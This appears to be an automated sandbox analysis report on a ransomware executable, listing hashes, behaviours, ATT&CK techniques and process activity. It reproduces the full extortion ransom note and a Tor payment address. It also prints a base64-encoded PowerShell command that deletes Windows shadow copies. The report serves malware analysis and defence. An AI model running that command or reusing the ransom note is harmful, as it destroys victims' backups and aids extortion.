Resubmissions

23-08-2021 11:22

210823-emdxssf3xx 10

29-06-2021 07:03

210629-eb8ghw1fma 10

Analysis

  • max time kernel
    173s
  • max time network
    41s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    29-06-2021 07:03

General

  • Target

    e25eaaac03aa958688cbe950275156169eb4955e145bc9627fcbfb36cd832a84.exe

  • Size

    116KB

  • MD5

    d1c9c12e08c8e2111da989e2318b1c42

  • SHA1

    d0c7f3c8de28d0fccec9d4925afeb5fa9dd62b5d

  • SHA256

    e25eaaac03aa958688cbe950275156169eb4955e145bc9627fcbfb36cd832a84

  • SHA512

    152f93308e6d15910e01d77c74bb86284e5929ece91627c1aa82fe5050f7a233e3b27a6c5834110478789d5d845c49775c3473b3ee838488f1cd19c6af17312c

Score
10/10

Malware Config

Extracted

Path

C:\42neb6-README.txt

Ransom Note
---=== Welcome. Again. ===--- [+] What's Happened? [+] Your files have been encrypted and currently unavailable. You can check it. All files in your system have 42neb6 extension. By the way, everything is possible to recover (restore) but you should follow our instructions. Otherwise you can NEVER return your data. [+] What are our guarantees? [+] It's just a business and we care only about getting benefits. If we don't meet our obligations, nobody will deal with us. It doesn't hold our interest. So you can check the ability to restore your files. For this purpose you should visit our website where you can decrypt one file for free. That is our guarantee. It doesn't metter for us whether you cooperate with us or not. But if you don't, you'll lose your time and data cause only we have the private key to decrypt your files. In practice - time is much more valuable than money. [+] How to get access to our website? [+] Use TOR browser: 1. Download and install TOR browser from this site: https://torproject.org/ 2. Visit our website: http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion When you visit our website, put the following data into the input form: Key: SfVj6/x0opfPWbQyAm66oVZkCBwI/Jq5RTkxnMYl3Ui7VEBzSsrE94KnW4Pi2B/y c/CkktsRs2LDEI6yECH0cMcWkfSqV1thkYwx8WpFaeW6JktMBQUpsuiYVccVqdAS 5RrhbAqENg9Jo6TiLVe95iqqk+nGAZGbdOh2U3LLPBY3V4g4ICcmfDij+fSpd7Y9 DCdGPDJhPWU3ZrNtKvXtuCKcEQyEjnVHuUg+FHcAwBhKy/ftm10hqhSnnHmW/thA 85BchOdf0Kh/ThDW7YzD5WqI2TNLZBeyG4hv4AukyJDloqYgsb5+X/eHFQkUqS4W aN7YpNmhr7kbP50L9ua3VLuIG6UtjtL3UsZ+sIY8EDhgnmg/+IMlDpfg3B5zp7on zux74JMAuqzy6Rkkf/ZIac06IvFhl+iQOkrTVxrxeH5HEC6JRLPN4Tc2XmJBrMRI 8WYqm5bPyOhbeiMl6qs7ySkzL4VHVcWw2FjxBkk7Gh8gnExsO5cCG4bHOSHQD9ar 5DAbT3p4IxkrflMb9Fwo4BYQ5cb/zYOEDq2g6RMdIGSSJuy2exJ5UB5j4+I0GVgu kSqJUFAOt75O7agtH7GLzaDurn4BPrJo3SjmbdUw/zK6rJXaz0f5RO6GJ2jZNKk4 fwSmIWo3lRW8IK9Vl46b2IOwF1kMamCj29zeURy3oPKFknY5hTC1KQm4870ah+Ll bVuVV6ln6LzAxUh/qsvNFYsdy7jm+lZiesxFC4ZPXmU8p8C8Lk8+0kR1xLn4LkOO mqIG8mkM/CRbKLxfup91IqZmGuXBKfsqxM+y+mM9znQNrG4MvbeW+mCWvmBY84A7 a70W1D4/Nlmj7X2yZqf3iiMIpT/zh211VgFqciXPiyfqUk4LBZT8mboR+k5uCyic 6ikfAy+OyBKeSxrkqvZ40ZofVxTR2vg42KP+yRLRNmxMgBA3MZQ1U831w0GXKFnh CcoddU8YCYZ7ekMz3QlBBQCxyd62LvwgoMsvAVDsggZcm8jrE4/F5DBFoGMH15D5 Qhs1NcBSU/nQ4nneQpLp6NxCnATd2ttnSkKUdtEfDOx1uBeBwNrrVZKFhtlZU0zQ giOebpSFrCJVTwJEritmo6KTMJBk0hi57l7KsuCS2AM7uoLpb+D+rehC4B1eGDce O/VYl6h5H0uMF/LUkMmXboEfob3X2PzfmNoQ6k1oU/eJuPsa+MxVGwSW86QZZdUt vgGWD+MHOL6tx8l8gv4+afZSY7fH7wYZJsCahETvRB+i+Aa3Y412bG34tZgl5puL nPtEl7Q9jTjvxfuN6n6JLf3T6Fi/v5V3PNimCQ== !!! DANGER !!! DON'T try to change files by yourself, DON'T use any third party software or antivirus solutions to restore your data - it may entail the private key damage and as a result all your data loss! !!! !!! !!! ONE MORE TIME: It's in your best interests to get your files back. From our side we (the best specialists in this sphere) ready to make everything for restoring but please do not interfere. !!! !!! !!
URLs

http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion

Signatures

  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e25eaaac03aa958688cbe950275156169eb4955e145bc9627fcbfb36cd832a84.exe
    "C:\Users\Admin\AppData\Local\Temp\e25eaaac03aa958688cbe950275156169eb4955e145bc9627fcbfb36cd832a84.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1208
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:660
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1520
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:772

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/660-61-0x0000000000000000-mapping.dmp
    • memory/660-62-0x000007FEFC141000-0x000007FEFC143000-memory.dmp
      Filesize

      8KB

    • memory/660-63-0x00000000020A0000-0x00000000020A1000-memory.dmp
      Filesize

      4KB

    • memory/660-64-0x000000001AD70000-0x000000001AD71000-memory.dmp
      Filesize

      4KB

    • memory/660-65-0x000000001ACF0000-0x000000001ACF2000-memory.dmp
      Filesize

      8KB

    • memory/660-66-0x000000001ACF4000-0x000000001ACF6000-memory.dmp
      Filesize

      8KB

    • memory/660-67-0x0000000002430000-0x0000000002431000-memory.dmp
      Filesize

      4KB

    • memory/660-68-0x00000000026F0000-0x00000000026F1000-memory.dmp
      Filesize

      4KB

    • memory/660-69-0x000000001AC50000-0x000000001AC51000-memory.dmp
      Filesize

      4KB

    • memory/1208-60-0x0000000076281000-0x0000000076283000-memory.dmp
      Filesize

      8KB